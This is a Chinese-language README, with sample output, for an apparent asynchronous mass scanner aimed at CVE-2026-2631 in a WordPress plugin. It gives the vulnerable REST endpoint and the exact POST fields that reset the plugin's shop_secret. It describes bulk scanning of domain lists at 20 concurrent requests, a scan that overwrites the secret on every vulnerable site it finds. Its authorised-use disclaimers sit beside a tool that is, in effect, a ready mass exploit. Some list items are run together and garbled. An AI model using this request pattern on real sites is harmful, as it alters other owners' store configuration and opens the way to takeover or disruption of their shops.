用于内部 WordPress 验证的私有异步批量检测工具
该工具执行破坏性验证。
它会向目标端点发送 POST 请求,并可能更改易受攻击目标上的
shop_secret。请仅在您拥有或明确授权测试的系统上使用。
本项目是一个轻量级异步批量检测工具,用于对您拥有的 WordPress 目标及子域进行 CVE-2026-2631 暴露情况的私有验证。
该扫描器旨在:
本仓库仅供私有/内部使用。
aiohttp 的异步扫描vuln_results.txtrich 后支持丰富的彩色输出扫描器向以下地址发送请求:
/wp-json/gsf/v1/update-options
它使用包含以下验证字段的 POST 请求:
action=resetStoreConfigrationsshop_secret=<自定义或默认值>当满足以下条件时,目标被标记为易受攻击:
200,且扫描器还会应用简单的错误模式过滤器以减少明显的误报。
aiohttprich (可选,用于彩色输出)安装依赖:
pip install aiohttp rich
准备您的目标文件,例如 list.txt:
example.com
sub.example.com
https://app.example.com
http://dev.example.com
运行扫描器:
python main.py
脚本将提示输入:
YES)shop_secret 值默认值包括:
list.txt2010 秒 #####################################################################
# CVE-2026-2631 Scanner - Async Mass Checker (Author AnggaTechI) #
# Only vulnerable targets will be shown and logged. #
# WARNING: This test CHANGES shop_secret on vulnerable #
# sites. Use only with permission. #
# https://github.com/AnggaTechI #
#####################################################################
⚠️ DESTRUCTIVE OPERATION WARNING
This script will change shop_secret on vulnerable sites.
Scanning 250 targets with 20 concurrent requests...
Only vulnerable sites will appear below.
https://target.tld -> Vuln Found
https://sub.target.tld -> Vuln Found
[Progress] 50/250 scanned...
[Progress] 100/250 scanned...
=== Scan Complete ===
Total targets : 250
Vulnerable found : 2
Errors (by type) :
- timeout: 4
- connection: 7
正向发现结果保存到:
vuln_results.txt
仅将识别为易受攻击的目标写入结果文件。
本仓库仅用于私有研究和内部验证目的。
作者对因不当操作本工具而导致的滥用、未经授权的扫描、服务中断或配置更改概不负责。
请负责任地使用。请谨慎使用。请仅在获得许可的情况下使用。
AnggaTechI
用于内部工作流程的私有安全工具。